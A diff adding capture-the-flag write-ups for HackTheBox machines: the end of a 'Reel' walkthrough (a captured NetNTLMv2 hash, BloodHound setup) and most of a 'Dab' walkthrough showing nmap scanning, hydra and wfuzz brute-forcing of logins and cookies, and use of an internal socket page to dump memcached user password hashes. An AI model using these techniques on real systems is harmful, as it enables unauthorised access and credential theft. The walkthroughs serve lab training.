+ [*] tom::HTB:aaaaaaaaaaaaaaaa:97ed7e26f0ec5b28ae6cb130414917ed:0101000000000000809d2c0658fbd70124aa28f4ea690e2f00000000010010007700660056004200780073004100710003001000770066005600420078007300410071000200100043007700570048007300450056005300040010004300770057004800730045005600530007000800809d2c0658fbd701060004000200000008003000300000000000000000000000003000005085ea7922d5329d13836e2e2a7350eacf7ee793c7c9205c7ad5e64f5183febb0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003900000000000000000000000000
+ [*] Connecting Share(1:IPC$)
+ [*] Connecting Share(2:nihilist)
+
+ ^C
+
+ [ 10.10.16.9/23 ] [ /dev/pts/14 ] [~/HTB/Reel]
+ → ls -lash
+ total 1.6M
+ 4.0K drwxr-xr-x 3 nothing nothing 4.0K Dec 27 20:29 .
+ 4.0K drwxr-xr-x 3 nothing nothing 4.0K Dec 25 21:26 ..
+ 112K -rwxr-xr-x 1 nothing nothing 110K May 29 2018 acls.csv
+ 4.0K -rwxr-xr-x 1 nothing nothing 3.5K Oct 29 2017 BloodHound.bin
+ 244K -rwxr-xr-x 1 nothing nothing 241K Oct 29 2017 BloodHound_Old.ps1
+ 4.0K drwxr-xr-x 4 nothing nothing 4.0K Dec 26 19:00 CVE-2017-0199
+ 8.0K -rw-r--r-- 1 nothing nothing 7.3K Dec 26 18:55 msfv.hta
+ 556K -rwxr-xr-x 1 nothing nothing 556K Oct 29 2017 SharpHound.exe
+ 624K -rwxr-xr-x 1 nothing nothing 623K Oct 29 2017 SharpHound.ps1
+
+
+
+Now that we have transfered the files back to our machine, let's inspect them using bloodhound:
+
+
+ [ 10.10.16.9/23 ] [ /dev/pts/15 ] [~/Tools]
+ → sudo apt install neo4j
+
+ [ 10.10.16.9/23 ] [ /dev/pts/15 ] [~/Tools]
+ → sudo neo4j console
+ Directories in use:
+ home: /usr/share/neo4j
+ config: /usr/share/neo4j/conf
+ logs: /usr/share/neo4j/logs
+ plugins: /usr/share/neo4j/plugins
+ import: /usr/share/neo4j/import
+ data: /usr/share/neo4j/data
+ certificates: /usr/share/neo4j/certificates
+ licenses: /usr/share/neo4j/licenses
+ run: /usr/share/neo4j/run
+ Starting Neo4j.
+ 2021-12-27 20:10:00.054+0000 INFO Starting...
+ 2021-12-27 20:10:00.455+0000 INFO This instance is ServerId{39ac0325} (39ac0325-ca50-4041-ba6d-444c78dc4026)
+ 2021-12-27 20:10:02.130+0000 INFO ======== Neo4j 4.4.2 ========
+ 2021-12-27 20:10:03.469+0000 INFO Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
+ 2021-12-27 20:10:03.473+0000 INFO Setting up initial user from defaults: neo4j
+ 2021-12-27 20:10:03.474+0000 INFO Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
+ 2021-12-27 20:10:03.481+0000 INFO Setting version for 'security-users' to 3
+ 2021-12-27 20:10:03.483+0000 INFO After initialization of system graph model component 'security-users' have version 3 and status CURRENT
+ 2021-12-27 20:10:03.488+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
+ 2021-12-27 20:10:03.700+0000 INFO Bolt enabled on localhost:7687.
+ 2021-12-27 20:10:04.423+0000 INFO Remote interface available at http://localhost:7474/
+ 2021-12-27 20:10:04.428+0000 INFO id: AC467907227285E4E491280BBC436619BBDF6A413FD78BD3F4BCB8455310E603
+ 2021-12-27 20:10:04.428+0000 INFO name: system
+ 2021-12-27 20:10:04.428+0000 INFO creationDate: 2021-12-27T20:10:02.593Z
+ 2021-12-27 20:10:04.428+0000 INFO Started.
+
+
+
+
+Then goto **http://127.0.0.1:7474** and login with credentials **neo4j:neo4j**
+
+
+
+
+ [ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools]
+ → wget https://github.com/BloodHoundAD/BloodHound/releases/download/4.0.3/BloodHound-linux-x64.zip
+
+ [ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools]
+ → mkdir Bloodhound
+
+ [ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools]
+ → mv BloodHound-linux-x64.zip Bloodhound/
+
+ [ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools]
+ → cd Bloodhound
+
+ [ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools/Bloodhound]
+ → unzip BloodHound-linux-x64.zip
+
+ [ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools/Bloodhound]
+ → ls -l
+ total 100032
+ drwxrwxr-x 5 nothing nothing 4096 Jul 15 20:13 BloodHound-linux-x64
+ -rw-r--r-- 1 nothing nothing 102425633 Dec 8 05:47 BloodHound-linux-x64.zip
+
+ [ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools/Bloodhound]
+ → cd BloodHound-linux-x64
+
+ [ 10.10.16.9/23 ] [ /dev/pts/20 ] [Tools/Bloodhound/BloodHound-linux-x64]
+ → ls -l
+ total 175752
+ -rwxr-xr-x 1 nothing nothing 127561112 Jul 15 20:13 BloodHound
+ -rw-r--r-- 1 nothing nothing 179981 Jul 15 20:13 chrome_100_percent.pak
+ -rw-r--r-- 1 nothing nothing 321151 Jul 15 20:13 chrome_200_percent.pak
+ -rwxr-xr-x 1 nothing nothing 6322128 Jul 15 20:13 chrome-sandbox
+ -rw-r--r-- 1 nothing nothing 10505952 Jul 15 20:13 icudtl.dat
+ -rwxr-xr-x 1 nothing nothing 243992 Jul 15 20:13 libEGL.so
+ -rwxr-xr-x 1 nothing nothing 3103488 Jul 15 20:13 libffmpeg.so
+ -rwxr-xr-x 1 nothing nothing 8948976 Jul 15 20:13 libGLESv2.so
+ -rwxr-xr-x 1 nothing nothing 4488304 Jul 15 20:13 libvk_swiftshader.so
+ -rwxr-xr-x 1 nothing nothing 8483376 Jul 15 20:13 libvulkan.so
+ -rw-r--r-- 1 nothing nothing 1060 Jul 15 20:13 LICENSE
+ -rw-r--r-- 1 nothing nothing 4710103 Jul 15 20:13 LICENSES.chromium.html
+ drwxrwxr-x 2 nothing nothing 4096 Jul 15 20:13 locales
+ drwxrwxr-x 3 nothing nothing 4096 Jul 15 20:13 resources
+ -rw-r--r-- 1 nothing nothing 4835574 Jul 15 20:13 resources.pak
+ -rw-r--r-- 1 nothing nothing 50591 Jul 15 20:13 snapshot_blob.bin
+ drwxrwxr-x 2 nothing nothing 4096 Jul 15 20:13 swiftshader
+ -rw-r--r-- 1 nothing nothing 170904 Jul 15 20:13 v8_context_snapshot.bin
+ -rw-r--r-- 1 nothing nothing 5 Jul 15 20:13 version
+ -rw-r--r-- 1 nothing nothing 107 Jul 15 20:13 vk_swiftshader_icd.json
+
+ [ 10.10.16.9/23 ] [ /dev/pts/20 ] [Tools/Bloodhound/BloodHound-linux-x64]
+ → sudo ln -s $(pwd)/BloodHound /usr/local/bin/bloodhound
+ [sudo] password for nothing:
+
+
+
+`   
+
+Now this means that you need to install the bloodhound version that was available at the time when the box was released, so let's install the Bloodhound version from 2018:
+
+
+ [ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/HTB/Reel]
+ → which bloodhound
+ /usr/local/bin/bloodhound
+
+ [ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/HTB/Reel]
+ → rm /usr/local/bin/bloodhound
+ rm: cannot remove '/usr/local/bin/bloodhound': Permission denied
+
+ [ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/HTB/Reel]
+ → sudo !!
+
+ [ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/HTB/Reel]
+ → sudo rm /usr/local/bin/bloodhound
+ [sudo] password for nothing:
+
+ [ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/Tools]
+ → ls -lash
+ total 12K
+ 4.0K drwxr-xr-x 3 nothing nothing 4.0K Dec 27 21:19 .
+ 4.0K drwxr-xr-x 28 nothing nothing 4.0K Mar 27 12:49 ..
+ 4.0K drwxr-xr-x 3 nothing nothing 4.0K Dec 27 21:19 Bloodhound
+
+ [ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/Tools]
+ → rm -rf Bloodhound
+
+ [ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools]
+ → wget https://github.com/BloodHoundAD/BloodHound/releases/download/2.0.4/BloodHound-linux-x64.zip
+
+ [ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools]
+ → unzip BloodHound-linux-x64.zip
+
+ [ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools]
+ → cd BloodHound-linux-x64
+
+ [ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
+ → sudo ln -s $(pwd)/BloodHound /usr/local/bin/bloodhound
+ [sudo] password for nothing:
+
+ [ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
+ → which bloodhound
+ /usr/local/bin/bloodhound
+
+ [ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
+ → bloodhound
+ bloodhound: error while loading shared libraries: libgconf-2.so.4: cannot open shared object file: No such file or directory
+
+ [ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
+ → sudo apt install libgconf-2-4 -y
+ Reading package lists... Done
+
+ [ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
+ → bloodhound
+ Gtk-Message: 13:00:16.146: Failed to load module "gail"
+
+
+
+Then we repeat the previous steps and see the result after uploading the acls.csv file:
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/12.md b/Hard/12.md
new file mode 100644
index 0000000..ead45c4
--- /dev/null
+++ b/Hard/12.md
@@ -0,0 +1,848 @@
+# Dab Writeup
+
+
+
+## Introduction :
+
+Dab is a hard linux box released back in August 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~/_HTB/dab]
+ → sudo nmap -vvv -sTU -p- 10.10.10.86 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ [sudo] password for nothing:
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Discovered open port 80/tcp on 10.10.10.86
+ Discovered open port 22/tcp on 10.10.10.86
+ Discovered open port 21/tcp on 10.10.10.86
+ Discovered open port 8080/tcp on 10.10.10.86
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~/_HTB/dab]
+ → sudo nmap -sCV -p80,21,22,8080 10.10.10.86
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-15 21:52 CET
+ Nmap scan report for 10.10.10.86
+ Host is up (0.036s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp vsftpd 3.0.3
+ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ |_-rw-r--r-- 1 0 0 8803 Mar 26 2018 dab.jpg
+ | ftp-syst:
+ | STAT:
+ | FTP server status:
+ | Connected to ::ffff:10.10.14.16
+ | Logged in as ftp
+ | TYPE: ASCII
+ | No session bandwidth limit
+ | Session timeout in seconds is 300
+ | Control connection is plain text
+ | Data connections will be plain text
+ | At session startup, client count was 3
+ | vsFTPd 3.0.3 - secure, fast, stable
+ |_End of status
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 20:05:77:1e:73:66:bb:1e:7d:46:0f:65:50:2c:f9:0e (RSA)
+ | 256 61:ae:15:23:fc:bc:bc:29:13:06:f2:10:e0:0e:da:a0 (ECDSA)
+ |_ 256 2d:35:96:4c:5e:dd:5c:c0:63:f0:dc:86:f1:b1:76:b5 (ED25519)
+ 80/tcp open http nginx 1.10.3 (Ubuntu)
+ |_http-server-header: nginx/1.10.3 (Ubuntu)
+ | http-title: Login
+ |_Requested resource was http://10.10.10.86/login
+ 8080/tcp open http nginx 1.10.3 (Ubuntu)
+ |_http-open-proxy: Proxy might be redirecting requests
+ |_http-server-header: nginx/1.10.3 (Ubuntu)
+ |_http-title: Internal Dev
+ Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+We investigate using burpsuite's repeater:
+
+
+
+Here we investigate the error codes of our login attempts with a possible username (admin) and an improbable one (adminhaha):
+
+ 
+
+So we got the following results:
+
+
+ admin >>> Error: Login failed
+ adminhaha >>> Error: Login failed**.**
+
+
+
+This is something you need to check, do you get the same error message when trying different usernames? and here the error codes are different. which gives us a hint that admin is a username. Since we know that the trailing dot is indicative that we have a correct username, we're going to use hydra to enumerate that.
+
+
+
+
+ [DATA] attacking http-post-form://10.10.10.86:80/login:username=^USER^&password;=^PASS^&submit;=Login:Login failed.<
+ [80][http-post-form] host: 10.10.10.86 login: ADMIN password: hahhahhaha
+ [80][http-post-form] host: 10.10.10.86 login: Admin password: hahhahhaha
+ [80][http-post-form] host: 10.10.10.86 login: Audrey password: hahhahhaha
+ [80][http-post-form] host: 10.10.10.86 login: DEFAULT password: hahhahhaha
+ [80][http-post-form] host: 10.10.10.86 login: DEMO password: hahhahhaha
+ [80][http-post-form] host: 10.10.10.86 login: Demo password: hahhahhaha
+ [80][http-post-form] host: 10.10.10.86 login: admin password: hahhahhaha
+ [80][http-post-form] host: 10.10.10.86 login: default password: hahhahhaha
+ [80][http-post-form] host: 10.10.10.86 login: demo password: hahhahhaha
+
+
+Now that we have a list of usernames:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/5 ] [~/_HTB/dab]
+ → cat usernames
+ ADMIN
+ Admin
+ Audrey
+ DEFAULT
+ DEMO
+ Demo
+ admin
+ default
+ demo
+
+
+
+we can try to find the password for one of these usernames using hydra and rockyou.txt
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
+ → ls -lash /usr/share/wordlists/rockyou.txt
+ 134M -rw-r--r-- 1 root root 134M Jul 17 2019 /usr/share/wordlists/rockyou.txt
+
+ [ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
+ → hydra -L usernames -P /usr/share/wordlists/rockyou.txt 10.10.10.86 http-post-form "/login:username=^USER^&password;=^PASS^&submit;=Login:failed"
+ Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
+
+ Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-15 22:58:36
+ [DATA] max 16 tasks per 1 server, overall 16 tasks, 129099591 login tries (l:9/p:14344399), ~8068725 tries per task
+ [DATA] attacking http-post-form://10.10.10.86:80/login:username=^USER^&password;=^PASS^&submit;=Login:failed
+ [STATUS] 2643.00 tries/min, 2643 tries in 00:01h, 129096948 to do in 814:05h, 16 active
+ [80][http-post-form] host: 10.10.10.86 login: ADMIN password: Password1
+
+
+
+And it looks like we have credentials ! ADMIN:Password1 so let's login:
+
+
+
+It looks like an empty page with nothing useful on it, however it initiated something with memcache as we're going to see later on. To continue, we're going to take a look at port 8080:
+
+
+
+And here we get an error message telling us something about the pass auth cookie, so we need to figure out what the cookie is called. To do so we'll use wfuzz, when we run it without any filters we get the 322 character length:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/4 ] [/usr/share/wordlists]
+ → wfuzz -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "Cookie: FUZZ" http://10.10.10.86:8080
+ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.86:8080/
+ Total requests: 2588
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000003: 200 14 L 30 W 322 Ch "page"
+ 000000034: 200 14 L 30 W 322 Ch "login"
+ 000000036: 200 14 L 30 W 322 Ch "content"
+ 000000031: 200 14 L 30 W 322 Ch "s"
+ 000000033: 200 14 L 30 W 322 Ch "excerpt"
+ 000000007: 200 14 L 30 W 322 Ch "email"
+ 000000035: 200 14 L 30 W 322 Ch "search"
+ 000000015: 200 14 L 30 W 322 Ch "user"
+ 000000030: 200 14 L 30 W 322 Ch "description"
+ 000000001: 200 14 L 30 W 322 Ch "id"
+ 000000032: 200 14 L 30 W 322 Ch "post"
+ 000000029: 200 14 L 30 W 322 Ch "charset"
+ 000000023: 200 14 L 30 W 322 Ch "order"
+ 000000025: 200 14 L 30 W 322 Ch "p"
+ 000000026: 200 14 L 30 W 322 Ch "key"
+ 000000022: 200 14 L 30 W 322 Ch "mode"
+ 000000028: 200 14 L 30 W 322 Ch "start"
+ 000000024: 200 14 L 30 W 322 Ch "lang"
+ 000000027: 200 14 L 30 W 322 Ch "status"
+ 000000021: 200 14 L 30 W 322 Ch "data"
+ [...]
+
+
+So we're going to filter out the 322 character length using the --hh 322 flag:
+
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
+ → wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "Cookie: FUZZ" --hh 322 http://10.10.10.86:8080
+ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.86:8080/
+ Total requests: 2588
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000005: 200 14 L 29 W 324 Ch "password"
+
+ Total time: 11.62986
+ Processed Requests: 2588
+ Filtered Requests: 2587
+ Requests/sec.: 222.5305
+
+
+
+And we found it! the Cookie has to be set to the "password" value. So let's use burpsuite to make this process easier:
+
+  
+
+as expected, we get the cookie not set error, now let's set the cookie password parameter with a random value:
+
+
+
+And as you can see here, we get a different error message than previously, this means that the parameter "password" is valid, but the value that it posesses is not, so let's bruteforce it with a wordlist and as we do so, we need to first know what's the character response length:
+
+
+
+In this case it is 324 characters, so we need to use wfuzz's --hh 324 flag:
+
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
+ → wfuzz -c -w /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -H "Cookie: password=FUZZ" --hh 324 http://10.10.10.86:8080
+ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.86:8080/
+ Total requests: 10000
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000097: 200 21 L 48 W 540 Ch "secret"
+
+ Total time: 43.05595
+ Processed Requests: 10000
+ Filtered Requests: 9999
+ Requests/sec.: 232.2559
+
+
+so when you set the cookie parameter 'password' to 'secret' you get the following:
+
+   
+
+and when you send random values to the prompts you get this url and response:
+
+
+ http://10.10.10.86:8080/socket?port=nothing&cmd;=nowhere
+
+
+
+` 
+
+Now we don't need to use firefox to manually bruteforce this, let's use curl.
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
+ → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=1&cmd;=nothing'
+
+ 500 Internal Server Error
+
+
+ # Internal Server Error
+
+
+
+
+ The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
+
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
+ → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=21&cmd;=nothing' -s |tail +8
+
+
+
+
+
+
+
+ Status of cache engine: Online
+
+
+
+
+ #### TCP socket test
+
+
+
+
+
+
+
+
+
+
+ Output
+
+
+
+
+
+ 220 (vsFTPd 3.0.3)
+ 530 Please login with USER and PASS.
+
+
+
+%
+
+So here we see something interesting, we can scan the ports from that page. Let's trim out the useless infos from our output:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
+ → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=21&cmd;=nothing' -s |tail +20 | head -n -4
+
+
+
+ 220 (vsFTPd 3.0.3)
+ 530 Please login with USER and PASS.
+
+
+
+[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab] → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=22&cmd;=nothing' -s |tail +20 | head -n -4
+
+
+ SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
+ Protocol mismatch.
+
+
+
+[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab] → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=80&cmd;=nothing' -s |tail +20 | head -n -4
+
+
+ HTTP/1.1 400 Bad Request
+ Server: nginx/1.10.3 (Ubuntu)
+ Date: Sat, 16 Jan 2021 09:18:49 GMT
+ Content-Type: text/html
+ Content-Length: 182
+ Connection: close
+
+
+ 400 Bad Request
+
+ 400 Bad Request
+
nginx/1.10.3 (Ubuntu)
+
+
+
+
+
+So let's use wfuzz again to enumerate the ports:
+
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/4 ] [~/_HTB/dab]
+ → wfuzz -c -z range,1-65535 -u 'http://10.10.10.86:8080/socket?port=FUZZ&cmd;=nothing' -H "Cookie: password=secret" --hc=500
+ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.86:8080/socket?port=FUZZ&cmd;=nothing
+ Total requests: 65535
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000021: 200 28 L 61 W 627 Ch "21"
+ 000000022: 200 28 L 55 W 629 Ch "22"
+ 000000080: 200 40 L 84 W 1010 Ch "80"
+ 000008080: 200 40 L 84 W 1010 Ch "8080"
+ 000011211: 200 27 L 52 W 576 Ch "11211"
+ 000050528: 200 27 L 52 W 577 Ch "50528"
+
+
+
+looks like we picked up something our nmap scan didnt earlier:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=nothing' -s |tail +20 | head -n -4
+
+
+
+ ERROR
+
+
+
+[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab] → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=50528&cmd;=nothing' -s |tail +20 | head -n -4
+
+These error codes aren't helpful although we now know that these ports are most likely to be our next steps. So first we do a bit of research on port 11211 and we find that it may correspond to [memcached](https://memcached.org/)
+
+
+
+Based on this, we can enumerate memcached further:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=version' -s |tail +20 | head -n -4
+
+
+
+ VERSION 1.4.25 Ubuntu
+
+
+
+[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab] → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=stats slabs' -s |tail +20 | head -n -4
+
+
+ STAT 16:chunk_size 2904
+ STAT 16:chunks_per_page 361
+ STAT 16:total_pages 1
+ STAT 16:total_chunks 361
+ STAT 16:used_chunks 1
+ STAT 16:free_chunks 360
+ STAT 16:free_chunks_end 0
+ STAT 16:mem_requested 2880
+ STAT 16:get_hits 0
+ STAT 16:cmd_set 2
+ STAT 16:delete_hits 0
+ STAT 16:incr_hits 0
+ STAT 16:decr_hits 0
+ STAT 16:cas_hits 0
+ STAT 16:cas_badval 0
+ STAT 16:touch_hits 0
+ STAT 26:chunk_size 27120
+ STAT 26:chunks_per_page 38
+ STAT 26:total_pages 1
+ STAT 26:total_chunks 38
+ STAT 26:used_chunks 1
+ STAT 26:free_chunks 37
+ STAT 26:free_chunks_end 0
+ STAT 26:mem_requested 24699
+ STAT 26:get_hits 13640
+ STAT 26:cmd_set 29
+ STAT 26:delete_hits 0
+ STAT 26:incr_hits 0
+ STAT 26:decr_hits 0
+ STAT 26:cas_hits 0
+ STAT 26:cas_badval 0
+ STAT 26:touch_hits 0
+ STAT active_slabs 2
+ STAT total_malloced 2078904
+ END
+
+
+
+[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab] → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=stats items' -s |tail +20 | head -n -4
+
+
+ STAT items:16:number 1
+ STAT items:16:age 48401
+ STAT items:16:evicted 0
+ STAT items:16:evicted_nonzero 0
+ STAT items:16:evicted_time 0
+ STAT items:16:outofmemory 0
+ STAT items:16:tailrepairs 0
+ STAT items:16:reclaimed 0
+ STAT items:16:expired_unfetched 0
+ STAT items:16:evicted_unfetched 0
+ STAT items:16:crawler_reclaimed 0
+ STAT items:16:crawler_items_checked 0
+ STAT items:16:lrutail_reflocked 0
+ STAT items:26:number 1
+ STAT items:26:age 48410
+ STAT items:26:evicted 0
+ STAT items:26:evicted_nonzero 0
+ STAT items:26:evicted_time 0
+ STAT items:26:outofmemory 0
+ STAT items:26:tailrepairs 0
+ STAT items:26:reclaimed 0
+ STAT items:26:expired_unfetched 0
+ STAT items:26:evicted_unfetched 0
+ STAT items:26:crawler_reclaimed 0
+ STAT items:26:crawler_items_checked 0
+ STAT items:26:lrutail_reflocked 0
+ END
+
+
+
+So here we managed to get information on the OS, and the items and memory, which are known as slabs. You can see their ids are either 16 or 26, for each slab we can use **stats cachedump** to give us each item in the slab with its size and expiration timestamp:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=stats cachedump 16 0' -s |tail +20 | head -n -4
+
+
+
+ ITEM stock [2807 b; 1610748196 s]
+ END
+
+
+
+[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab] → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=stats cachedump 26 0' -s |tail +20 | head -n -4
+
+
+ ITEM users [24625 b; 1610748187 s]
+ END
+
+
+
+We can also get Users data:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=get users' -s |tail +20 | head -n -4
+
+
+
+ END
+
+
+
+Well, not quite, that is because we need to login like we did earlier:
+
+
+
+Once we logged in again, get the users info but format it correctly otherwise this is going to be some unreadable garbage:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=get users' -s |tail +20 | head -n -4
+
+
+
+ VALUE users 0 24625
+ {"quinton_dach": "17906b445a05dc42f78ae86a92a57bbd", "jackie.abbott": "c6ab361604c4691f78958d6289910d21", "isidro": "e4a4c90483d2ef61de42af1f044087f3", "roy": "afbde995441e19497fe0695e9c539266", "colleen": "d3792794c3143f7e04fd57dc8b085cd4", "harrison.hessel": "bc5f9b43a0336253ff947a4f8dbdb74f", "asa.christiansen": "d7505316e9a10fc113126f808663b5a4", "jessie": "71f08b45555acc5259bcefa3af63f4e1", "milton_hintz": "8f61be2ebfc66a5f2496bbf849c89b84", "demario_homenick": "2c22da161f085a9aba62b9bbedbd4ca7", "paris": "ef9b20082b7c234c91e165c947f10b71", "gardner_ward": "eb7ed0e8c112234ab1439726a4c50162", "daija.casper": "4d0ed472e5714e5cca8ea7272b15173a", "alanna.prohaska": "6980ba8ee392b3fa6a054226b7d8dd8f", "russell_borer": "cb10b94b5dbb5dfab049070a2abda16e", "domenica.kulas": "5cb322691472f05130416b05b22d4cdf", "davon.kuhic": "e301e431db395ab3fdc123ba8be93ff9", "alana": "41c85abbc7c64d93ca7bda5e2cfc46c2", "bryana": "4d0da0f96ecd0e8b655573cd67b8a1c1", "elmo_welch": "89122bf3ade23faf37b470f1fa5c7358", "sasha": "fbabdcc0eb2ace9aa5b88148a02f78fe", "krystina.lynch": "1b4b73070f563b787afaf435943fac9c", "rick_kirlin": "8952b9d5be0dcb77bdf349cc0e79b49d", "elenora": "edbe5879fa4e452ceceedccf59067409", "broderick": "
+ [...]
+
+
